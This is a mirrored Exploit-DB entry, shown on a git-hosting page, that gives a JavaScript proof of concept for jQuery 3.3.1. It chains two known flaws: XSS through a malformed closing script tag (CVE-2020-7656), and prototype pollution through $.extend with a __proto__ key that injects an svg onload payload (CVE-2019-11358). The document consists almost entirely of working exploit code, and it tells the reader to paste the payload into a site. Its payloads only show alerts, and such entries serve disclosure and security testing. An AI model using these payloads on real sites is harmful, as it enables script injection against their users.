bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52141.txt
Exploit-DB 2bc15f74f8 DB: 2025-04-09 
9 changes to exploits/shellcodes/ghdb

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

GeoVision GV-ASManager 6.1.0.0  - Information Disclosure

Jasmin Ransomware - Arbitrary File Download (Authenticated)

jQuery 3.3.1 - Prototype Pollution & XSS Exploit

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

UNA CMS 14.0.0-RC - PHP Object Injection

WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation
2025-04-09 00:16:23 +00:00

72 lines
No EOL
2.7 KiB
Text
Raw Permalink Blame History

# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps
# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.
# PoC (Proof of Concept):
# ------------------------------------
/*
* Exploit for CVE-2020-7656 and CVE-2019-11358
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
*/
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);
// 2. Function to execute after jQuery is loaded
script.onload = function() {
console.log("[+] Vulnerable jQuery loaded!");
// 3. Inject malicious content for XSS (CVE-2020-7656)
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
$('body').append(maliciousContent);
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
// 4. Exploit Prototype Pollution (CVE-2019-11358)
const defaultConfig = {
"backLink": "<a href='https://example.com'>Go Back</a>"
};
const maliciousParams = {
"__proto__": {
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
}
};
// 5. Merge objects using vulnerable $.extend
let config = $.extend(true, defaultConfig, maliciousParams);
console.log("[+] Prototype Pollution executed via $.extend().");
// 6. Create a container to inject malicious content
const container = document.createElement('div');
container.id = 'backLinkContainer';
document.body.appendChild(container);
// 7. Inject malicious content into the DOM
$('#backLinkContainer').html(config.backLink);
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};
// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
Reference in a new issue View git blame Copy permalink